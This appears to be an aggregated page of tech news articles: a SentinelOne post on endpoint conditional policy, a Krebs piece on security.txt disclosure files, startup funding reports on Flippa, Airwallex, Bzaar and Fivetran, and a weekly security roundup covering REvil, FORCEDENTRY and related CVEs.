Once this Zero Trust app is activated, you are all set: the Singularity Conditional Policy Engine is enabled. Moving forward, in the event that an endpoint is compromised, it will move in real-time to the risky endpoint group and increase the security enforcements. Once the threat is remediated, the endpoint will move back to its original group.

Singularity Conditional Policy moving compromised endpoint to risky endpoint group and moving back to the original group once the threat is contained.

Summary

SentinelOne continues to lead the way with innovations aimed at keeping organizations safe while supporting the operational challenges of business growth. The Singularity Conditional Policy app is part of SentinelOne’s ZTN strategy helping organizations protect, detect, respond, and recover from cyber threats. Our endpoint-centric ZTN trust-but-verify approach makes it possible to evaluate the health state of endpoints and adjust security enforcements based on that state.

We can no longer assume that because the logged-on user is known to an organization, they should be safe and granted access to all corporate services and resources. Endpoints can no longer be treated equally without considering their risk profile.

Instead, security policies must be situationally-aware and dynamically enforced. Singularity Conditional Policy is SentinelOne’s first endpoint-centric Conditional Policy Engine that is now available to all SentinelOne customers. To find out more contact us or request a free demo.


Like this article? Follow us on LinkedIn, Twitter, YouTube or Facebook to see the content we post.

Read more about Cyber Security

Does Your Organization Have a Security.txt File?

It happens all the time: Organizations get hacked because there isn’t an obvious way for security researchers to let them know about security vulnerabilities or data leaks. Or maybe it isn’t entirely clear who should get the report when remote access to an organization’s internal network is being sold in the cybercrime underground.

In a bid to minimize these scenarios, a growing number of major companies are adopting “Security.txt,” a proposed new Internet standard that helps organizations describe their vulnerability disclosure practices and preferences.

An example of a security.txt file. Image: Securitytxt.org.

The idea behind Security.txt is straightforward: The organization places a file called security.txt in a predictable place — such as example.com/security.txt, or example.com/.well-known/security.txt. What’s in the security.txt file varies somewhat, but most include links to information about the entity’s vulnerability disclosure policies and a contact email address.

The security.txt file made available by USAA, for example, includes links to its bug bounty program; an email address for disclosing security related matters; its public encryption key and vulnerability disclosure policy; and even a link to a page where USAA thanks researchers who have reported important cybersecurity issues.

Other security.txt disclosures are less verbose, as in the case of HCA Healthcare, which lists a contact email address, and a link to HCA’s “responsible disclosure” policies. Like USAA and many other organizations that have published security.txt files, HCA Healthcare also includes a link to information about IT security job openings at the company.

Having a security.txt file can make it easier for organizations to respond to active security threats. For example, just this morning a trusted source forwarded me the VPN credentials for a major clothing retailer that were stolen by malware and made available to cybercriminals. Finding no security.txt file at the retailer’s site using gotsecuritytxt.com (which checks a domain for the presence of this contact file), KrebsonSecurity sent an alert to its “security@” email address for the retailer’s domain.

Many organizations have long unofficially used (if not advertised) the email address security@[companydomain] to accept reports about security incidents or vulnerabilities. Perhaps this particular retailer also did so at one point, however my message was returned with a note saying the email had been blocked. KrebsOnSecurity also sent a message to the retailer’s chief information officer (CIO) — the only person in a C-level position at the retailer who was in my immediate LinkedIn network. I still have no idea if anyone has read it.

Although security.txt is not yet an official Internet standard as approved by the Internet Engineering Task Force (IETF), its basic principles have so far been adopted by at least eight percent of the Fortune 100 companies. According to a review of the domain names for the latest Fortune 100 firms via gotsecuritytxt.com, those include Alphabet, Amazon, Facebook, HCA Healthcare, Kroger, Procter & Gamble, USAA and Walmart.

There may be another good reason for consolidating security contact and vulnerability reporting information in one, predictable place. Alex Holden, founder of the Milwaukee-based consulting firm Hold Security, said it’s not uncommon for malicious hackers to experience problems getting the attention of the proper people within the very same organization they have just hacked.

“In cases of ransom, the bad guys try to contact the company with their demands,” Holden said. “You have no idea how often their messages get caught in filters, get deleted, blocked or ignored.”

GET READY TO BE DELUGED

So if security.txt is so great, why haven’t more organizations adopted it yet? It seems that setting up a security.txt file tends to invite a rather high volume of spam. Most of these junk emails come from self-appointed penetration testers who — without any invitation to do so — run automated vulnerability discovery tools and then submit the resulting reports in hopes of securing a consulting engagement or a bug bounty fee.

This dynamic was a major topic of discussion in these Hacker News threads on security.txt, wherein a number of readers related their experience of being so flooded with low-quality vulnerability scan reports that it became difficult to spot the reports truly worth pursuing further.

Edwin “EdOverflow” Foudil, the co-author of the proposed notification standard, acknowledged that junk reports are a major downside for organizations that offer up a security.txt file.

“This is actually stated in the specification itself, and it’s incredibly important to highlight that organizations that implement this are going to get flooded,” Foudil told KrebsOnSecurity. “One reason bug bounty programs succeed is that they are basically a glorified spam filter. But regardless of what approach you use, you’re going to get inundated with these crappy, sub-par reports.”

Often these sub-par vulnerability reports come from individuals who have scanned the entire Internet for one or two security vulnerabilities, and then attempted to contact all vulnerable organizations at once in some semi-automated fashion. Happily, Foudil said, many of these nuisance reports can be ignored or grouped by creating filters that look for messages containing keywords commonly found in automated vulnerability scans.

Foudil said despite the spam challenges, he’s heard tremendous feedback from a number of universities that have implemented security.txt.

“It’s been an incredible success with universities, which tend to have lots of older, legacy systems,” he said. “In that context, we’ve seen a ton of valuable reports.”

Foudil says he’s delighted that eight of the Fortune 100 firms have already implemented security.txt, even though it has not yet been approved as an IETF standard. When and if security.txt is approved, he hopes to spend more time promoting its benefits.

“I’m not trying to make money off this thing, which came about after chatting with quite a few people at DEFCON [the annual security conference in Las Vegas] who were struggling to report security issues to vendors,” Foudil said. “The main reason I don’t go out of my way to promote it now is because it’s not yet an official standard.”

Has your organization considered or implemented security.txt? Why or why not? Sound off in the comments below.

Flippa raises $11M to match online asset and business buyers, sellers

Flippa, an online marketplace to buy and sell online businesses and digital assets, announced its first venture-backed round, an $11 million Series A, as it sees over 600,000 monthly searches from investors looking to connect with business owners.

OneVentures led the round and was joined by existing investors Andrew Walsh (former Hitwise CEO), Flippa co-founders Mark Harbottle and Matt Mickiewicz, 99designs, as well as new investors Catch.com.au founders Gabby and Hezi Leibovich; RetailMeNot.com founders Guy King and Bevan Clarke; and Reactive Media founders Tim O’Neill and Tim Fouhy.

The company, with bases in both Austin and Australia, was started in 2009 and facilitates exits for millions of online business owners, some that operate on e-commerce marketplaces, blogs, SaaS and apps, the newest data integration being for Shopify, Blake Hutchison, CEO of Flippa, told TechCrunch.

He considers Flippa to be “the investment bank for the 99%,” of small businesses, providing an end-to end platform that includes a proprietary valuation product for businesses — processing over 4,000 valuations each month — and a matching algorithm to connect with qualified buyers.

Business owners can sell their companies directly through the platform and have the option to bring in a business broker or advisor. The company also offers due diligence and acquisition financing from Thrasio-owned Yardline Capital and a new service called Flippa Legal.

“Our strategy is verification at the source, i.e. data,” Hutchison said. “Users can currently connect to Stripe, QuickBooks Online, WooCommerce, Google Analytics and Admob for apps, which means they can expose their online business performance with one-click, and buyers can seamlessly assess financial and operational performance.”

Online retail, as a share of total retail sales, grew to 19.6% in 2020, up from 15.8% in 2019, driven largely by the global pandemic as sales shifted online while brick-and-mortar stores closed.

Meanwhile, Amazon has 6 million sellers, and Shopify sellers run over 1 million businesses. This has led to an emergence of e-commerce aggregators, backed by venture capital dollars, that are scooping up successful businesses to grow, finding many through Flippa’s marketplace, Hutchison said.

Flippa has over 3 million registered users and added 300,000 new registered users in the past 12 months. Overall transaction volume grows 100% year over year. Though being bootstrapped for over a decade, the company’s growth and opportunity drove Hutchison to go after venture capital dollars.

“There is a huge movement toward this being recognized as an asset class,” he said. “At the moment, the asset class is undervalued and driving a massive swarm as investors snap up businesses and aggregate them together. We see the future of these aggregators becoming ‘X company for apps’ or ‘X for blogs.’ ”

As such, the new funding will be used to double the company’s headcount to more than 100 people as it builds out its offices globally, as well as establishing outposts in Melbourne, San Francisco and Austin. The company will also invest in marketing and product development to scale its business valuation tool that Hutchison likens to the “Zillow Zestimate,” but for online businesses.

Nigel Dews, operating partner at OneVentures, has been following Flippa since it started. His firm is one of the oldest venture capital firms in Australia and has 30 companies in its portfolio focused on healthcare and technology.

He believes the company will create meaningful change for small businesses. The team combined with Flippa’s ability to connect buyers and sellers puts the company in a strong leadership position to take advantage of the marketplace effect.

“Flippa is an incredible opportunity for us,” he added. “You don’t often get a world-leading business in a brand new category with incredible tailwinds. We also liked that the company is based in Australia, but half of its revenue comes from the U.S.”

Airwallex raises $200M at a $4B valuation to double down on business banking

Business, now more than ever before, is going digital, and today a startup that’s building a vertically integrated solution to meet business banking needs is announcing a big round of funding to tap into the opportunity. Airwallex — which provides business banking services directly to businesses themselves as well as via a set of APIs that power other companies’ fintech products — has raised $200 million, a Series E round of funding that values the Australian startup at $4 billion.

Lone Pine Capital is leading the round, with new backers G Squared and Vetamer Capital Management, and previous backers 1835i Ventures (formerly ANZi), DST Global, Salesforce Ventures and Sequoia Capital China also participating.

The funding brings the total raised by Airwallex — which has head offices in Hong Kong and Melbourne, Australia — to $700 million, including a $100 million injection that closed out its Series D just six months ago.

Airwallex will be using the funding both to continue investing in its product and technology as well as to continue its geographical expansion and to focus on some larger business targets. The company has started to make some headway into Europe and the U.K. and that will be one big focus, along with the U.S.

The quick succession of funding and rising valuation underscore Airwallex’s traction to date around what CEO and co-founder Jack Zhang describes as a vertically integrated strategy.

That involves two parts. First, Airwallex has built all the infrastructure for the business banking services that it provides directly to businesses with a focus on small and medium enterprise customers. Second, it has packaged up that infrastructure into a set of APIs that a variety of other companies use to provide financial services directly to their customers without needing to build those services themselves — the so-called “embedded finance” approach.

“We want to own the whole ecosystem,” Zhang said to me. “We want to be like the Apple of business finance.”

That seems to be working out so far for Airwallex. Revenues were up almost 150% for the first half of 2021 compared to a year before, with the company processing more than US$20 billion for a global client portfolio that has quadrupled in size. In addition to tens of thousands of SMEs, it also, via APIs, powers financial services for other companies like GOAT, Papaya Global and Stake.

Airwallex got its start like many of the strongest startups do: It was built to solve a problem that the founders encountered themselves. In the case of Airwallex, Zhang tells me he had actually been working on a previous startup idea. He wanted to build the “Blue Bottle Coffee” of Asia Pacific out of Australia, and it involved buying and importing a lot of different materials, packaging and, of course, coffee from all around the world.

“We found that making payments as a small business was slow and expensive,” he said, since it involved banks in different countries and different banking systems, manual efforts to transfer money between them and many days to clear the payments. “But that was also my background — payments and trading — and so I decided that it was a much more fascinating problem for me to work on and resolve.”

Eventually one of his co-founders in the coffee effort came along, with the four co-founders of Airwallex ultimately including Zhang, along with Xijing Dai, Lucy Liu and Max Li.

It was 2014, and Airwallex got attention from VCs early on in part for being in the right place at the right time. A wave of startups building financial services for SMBs were definitely gaining ground in North America and Europe, filling a long-neglected hole in the technology universe, but there was almost nothing of the sort in the Asia Pacific region, and in those earlier days solutions were highly regionalized.

From there it was a no-brainer that starting with cross-border payments, the first thing Airwallex tackled, would soon grow into a wider suite of banking services involving payments and other cross-border banking services.

“In the last six years, we’ve built more than 50 bank integrations and now offer payments across 95 countries, payments through a partner network,” he added, with 43 of those offering real-time transactions. From that, it moved on to bank accounts and “other primitive stuff” with card issuance and more, he said, eventually building an end-to-end payment stack. 

Airwallex has tens of thousands of customers using its financial services directly, and they make up about 40% of its revenues today. The rest is the interesting turn the company decided to take to expand its business.

Airwallex had built all of its technology from the ground up itself, and it found that — given the wave of new companies looking for more ways to engage customers and become their one-stop shop — there was an opportunity to package that tech up in a set of APIs and sell that on to a different set of customers, those who also provided services for small businesses. That part of the business now accounts for 60% of Airwallex’s business, Zhang said, and is growing faster in terms of revenues. (The SMB business is growing faster in terms of customers, he said.)

A lot of embedded finance startups that base their business around building tech to power other businesses tend to stay at arm’s length from offering financial services directly to consumers. The explanation I have heard is that they do not wish to compete against their customers. Zhang said that Airwallex takes a different approach, by being selective about the customers they partner with, so that the financial services they offer would never be the kind that would not be in direct competition. The GOAT marketplace for sneakers, or Papaya Global’s HR platform are classic examples of this.

However, as Airwallex continues to grow, you can’t help but wonder whether one of those partners might like to gobble up all of Airwallex and take on some of that service provision role itself. In that context, it’s very interesting to see Salesforce Ventures returning to invest even more in the company in this round, given how widely the company has expanded from its early roots in software for salespeople into a massive platform providing a huge range of cloud services to help people run their businesses.

For now, it’s been the combination of its unique roots in Asia Pacific, plus its vertical approach of building its tech from the ground up, plus its retail acumen that has impressed investors and may well see Airwallex stay independent and grow for some time to come.

“Airwallex has a clear competitive advantage in the digital payments market,” said David Craver, MD at Lone Pine Capital, in a statement. “Its unique Asia-Pacific roots, coupled with its innovative infrastructure, products and services, speak volumes about the business’ global growth opportunities and its impressive expansion in the competitive payment providers space. We are excited to invest in Airwallex at this dynamic time, and look forward to helping drive the company’s expansion and success worldwide.”

Updated to note that the coffee business was in Australia, not Hong Kong.

Bzaar bags $4M to enable US retailers to source home, lifestyle products from India

Small businesses in the U.S. now have a new way to source home and lifestyle goods from new manufacturers. Bzaar, a business-to-business cross-border marketplace, is connecting retailers with over 50 export-ready manufacturers in India.

The U.S.-based company announced Monday that it raised $4 million in seed funding, led by Canaan Partners, and including angel investors Flipkart co-founder Binny Bansal, PhonePe founders Sameer Nigam and Rahul Chari, Addition founder Lee Fixel and Helion Ventures co-founder Ashish Gupta.

Nishant Verman and Prasanth Nair co-founded Bzaar in 2020 and consider their company to be like a “fair without borders,” Verman put it. Prior to founding Bzaar, Verman was at Bangalore-based Flipkart until it was acquired by Walmart in 2018. He then was at Canaan Partners in the U.S.

“We think the next 10 years of global trade will be different from the last 100 years,” he added. “That’s why we think this business needs to exist.”

Traditionally, small U.S. buyers did not have feet on the ground in manufacturing hubs, like China, to manage shipments of goods in the same way that large retailers did. Then Alibaba came along in the late 1990s and began acting as a gatekeeper for cross-border purchases, Verman said. U.S. goods imports from China totaled $451.7 billion in 2019, while U.S. goods imports from India in 2019 were $87.4 billion.

Bzaar screenshot. Image Credits: Bzaar

Small buyers could buy home and lifestyle goods, but it was typically through the same sellers, and there was not often a unique selection, nor were goods available handmade or using organic materials, he added.

With Bzaar, small buyers can purchase over 10,000 wholesale goods on its marketplace from other countries like India and Southeast Asia. The company guarantees products arrive within two weeks and manage all of the packaging logistics and buyer protection.

Verman and Nair launched the marketplace in April and had thousands users in three continents purchasing from the platform within six months. Meanwhile, products on Bzaar are up to 50% cheaper than domestic U.S. platforms, while SKU selection is growing doubling every month, Verman said.

The new funding will enable the company to invest in marketing to get in front of buyers and invest on its technology to advance its cataloging feature so that goods pass through customs seamlessly. Wanting to provide new features for its small business customers, Verman also intends to create a credit feature to enable buyers to pay in installments or up to 90 days later.

“We feel this is a once-in-a-lifetime shift in how global trade works,” he added. “You need the right team in place to do this because the problem is quite complex to take products from a small town in Vietnam to Nashville. With our infrastructure in place, the good news is there are already shops and buyers, and we are stitching them together to give buyers a seamless experience.”

 

Fivetran hauls in $565M on $5.6B valuation, acquires competitor HVR for $700M

Fivetran, the data connectivity startup, had a big day today. For starters it announced a $565 million investment on a $5.6 billion valuation, but it didn’t stop there. It also announced its second acquisition this year, snagging HVR, a data integration competitor that had raised more than $50 million, for $700 million in cash and stock.

The company last raised a $100 million Series C on a $1.2 billion valuation, increasing the valuation by over 5x. As with that Series C, Andreessen Horowitz was back leading the round, with participation from other double dippers General Catalyst, CEAS Investments, Matrix Partners and other unnamed firms or individuals. New investors ICONIQ Capital, D1 Capital Partners and YC Continuity also came along for the ride. The company reports it has now raised $730 million.

The HVR acquisition represents a hefty investment for the startup, grabbing a company for a price that is almost equal to all the money it has raised to date, but it provides a way to expand its market quickly by buying a competitor. Earlier this year Fivetran acquired Teleport Data as it continues to add functionality and customers via acquisition.

“The acquisition — a cash and stock deal valued at $700 million — strengthens Fivetran’s market position as one of the data integration leaders for all industries and all customer types,” the company said in a statement.

While that may smack of corporate marketing-speak, there is some truth to it, as pulling data from multiple sources, sometimes in siloed legacy systems, is a huge challenge for companies, and both Fivetran and HVR have developed tools to provide the pipes to connect various data sources and put it to work across a business.

Data is central to a number of modern enterprise practices, including customer experience management, which takes advantage of customer data to deliver customized experiences based on what you know about them, and data is the main fuel for machine learning models, which use it to understand and learn how a process works. Fivetran and HVR provide the nuts and bolts infrastructure to move the data around to where it’s needed, connecting to various applications like Salesforce, Box or Airtable, databases like Postgres SQL or data repositories like Snowflake or Databricks.

Whether bigger is better remains to be seen, but Fivetran is betting that it will be in this case as it makes its way along the startup journey. The transaction has been approved by both companies’ boards. The deal is still subject to standard regulatory approval, but Fivetran is expecting it to close in October.

The Good, the Bad and the Ugly in Cybersecurity – Week 38

The Good

A few new developments occured this week in the saga that is REvil ransomware. First off, REvil appears to have reactivated its infrastructure and has renewed its attacks, so far on a slightly smaller scale. New victims are appearing on their blog, and affiliates have resurfaced in specific underground forums in an effort to save some face and assure the world that they are kind and gentle cybercriminals.

However, the good news is that this week we also saw the release of a “master decrypter” for previous REvil victims.

The decrypter was the fruit of a joint collaboration between Bitdefender and “trusted law enforcement partners’. While it won’t help victims of the latest wave of REvil attacks, it does provide a simple and effective way for those who were hit prior to REvil’s recent hiatus after the Kaseya and other high profile attacks to recover previously encrypted assets. As a reminder, SentinelOne Singularity will prevent REvil ransomware attacks as well as the associated TTPs.

The Bad

This was a particularly colorful week with regards to Apple and their emergency patch for a set of security vulnerabilities that enabled the deployment and use of NSO Group spyware. At the heart of these matters is an exploit dubbed FORCEDENTRY, which takes advantage of a vulnerability in Apple’s Core Graphics framework.

What makes FORCEDENTRY so worrisome for users is that it does not require any user interaction to exploit, and since CoreGraphics is common to all Apple’s OS platforms, it can be leveraged against Apple’s iOS, iPadOS, watchOS, and macOS devices. Needless to say, the potentially exposed population is quite large and diverse. The flaw was originally reported by the Citizen Lab, who discovered it during an investigation into an iOS device belonging to a Saudi activist. The device had been infected by the NSO Group’s Pegasus spyware.

The bug was assigned CVE-2021-30860, and an emergency patch was released on September 13, 2021. It is believed that this flaw has been actively used against high-profile targets in the activist world as early as June 2020. Specially-crafted PDF documents can be used to deliver the exploit to targets, and it is simply the act of the receiving the PDF that leads to the infection. A truly scary zero-click exploit.

Apple has released updates to address this and other issues. However, users of older systems be aware: on the Mac, only Catalina and Big Sur have been patched for this vulnerability, so the almost 20% of Mac users still running macOS Mojave and earlier are out of luck. iPhone users require iOS 14.8 or later to receive the fix, while watchOS needs to be running 7.6.2 or higher.

The Ugly

This week, three agents tied to “Project Ravenadmitted to working against the United States government at the direction of the United Arab Emirates.

Under a deal designed to avoid prosecution, the three operatives were held to admit to working as spies for the U.A.E and ultimately violating U.S. laws, including the selling of military secrets and technology. As part of “Project Raven”, the individuals were responsible for multiple intrusions into networks within the borders of the United States. In addition, they located and stole “sophisticated cyber intrusion tools” without the obviously required permission. These individuals were all considered lone “mercenaries” or “hackers-for-hire”.

While the full outcome is yet to be determined, the deal they struck appears to require the agents to pay a sum of $1.69 million dollars and to relinquish all security clearance privileges in the United States.

On another note, this week SentinelLabs disclosed details around CVE-2021-3437, an HP OMEN Gaming Hub Escalation of Privilege and Denial of Service vulnerability in HP OMEN PCs. This high-severity flaw affects millions of HP devices and can be exploited to achieve kernel-level privileges, potentially offering full control of the targeted host. While gaming PCs aren’t usually found on the enterprise network, a vulnerable device in the home could be just as harmful to work when so many of us are connecting our company devices to our home networks these days.


Like this article? Follow us on LinkedIn, Twitter, YouTube or Facebook to see the content we post.

Read more about Cyber Security